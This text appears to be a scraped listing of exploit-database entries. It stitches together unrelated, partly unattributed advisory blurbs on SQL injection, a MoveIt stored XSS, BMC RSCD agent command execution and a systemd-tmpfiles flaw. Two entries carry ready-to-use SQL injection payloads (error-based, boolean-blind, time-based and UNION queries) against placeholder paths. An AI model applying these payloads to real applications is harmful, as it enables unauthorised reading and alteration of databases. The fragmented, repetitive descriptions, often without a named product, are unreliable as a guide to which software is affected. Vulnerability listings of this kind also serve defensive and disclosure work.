The vulnerability allows an attacker to inject sql commands into the vulnerable application. An attacker can send a specially crafted request to the vulnerable application in order to execute arbitrary sql commands in the back-end database. This can lead to the manipulation or disclosure of data.
IPSwitch MoveIt v8.1 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. Attackers can leverage this vulnerability to send malicious messages to other users in order to steal session cookies and launch client-side attacks.
SQL injection on [route] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/index.php?route=property/category Parameter: route (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: route=property/category'||(SELECT 'coKq' FROM DUAL WHERE 3062=3062 AND (SELECT 7059 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(7059=7059,1))),0x7176717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&filter_propertystatus=1&filter_propertycategory=63&filter_city=any&filter_address=any&filter_country_id=223&filter_zone_id=&filter_range=1;10&
SQL injection on [search_browse_product] POST parameter. The exploit uses boolean-based blind, error-based, AND/OR time-based blind and UNION query payloads.
The vulnerability allows an attacker to inject sql commands into the vulnerable application. An attacker can send a specially crafted request to vulnerable application and execute arbitrary sql commands in application's database. This can compromise the data and the security of the application.
This module exploits a weak access control check in the BMC Server Automation RSCD agent that allows arbitrary operating system commands to be executed without authentication. Note: Under Windows, non-powershell commands may need to be prefixed with 'cmd /c'.
Before version 237, the systemd-tmpfiles program will change the permissions and ownership of hard links. If the administrator disables the fs.protected_hardlinks sysctl, then an attacker can create hard links to sensitive files and subvert systemd-tmpfiles, particularly with 'Z' type entries.
This exploit allows an attacker to retrieve Windows system users with BMC BladeLogic RSCD agent. It was tested against v8.3.00.64 (Windows version) and is based on the Linux BMC getUsers exploit by ERNW.
The vulnerability allows an attacker to inject sql commands. The attacker can exploit the vulnerability by sending a malicious SQL query to the vulnerable parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The vulnerability allows an attacker to inject sql commands. Proof of Concept: http://localhost/[PATH]/index.php?option=com_cpeventcalendar&task=load&id=[SQL] Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: option=com_cpeventcalendar&task=load&id=1 AND 6741=6741 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: option=com_cpeventcalendar&task=load&id=1 AND (SELECT 7531 FROM(SELECT COUNT(*),CONCAT(0x716a707671,(SELECT (ELT(7531=7531,1))),0x717a6a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL <= 5.0.11 AND time-based blind (heavy query - comment) Payload: option=com_cpeventcalendar&task=load&id=1 AND 3954=BENCHMARK(5000000,MD5(0x4573626a))# Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: option=com_cpeventcalendar&task=load&id=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716a707671,0x4a61716b6d59557a4f5a496f7676584d57444e514d4d78626d42546e786d79747350424271687555,0x717a6a7a71),NULL,NULL,NULL-- cJFi
Services By CQR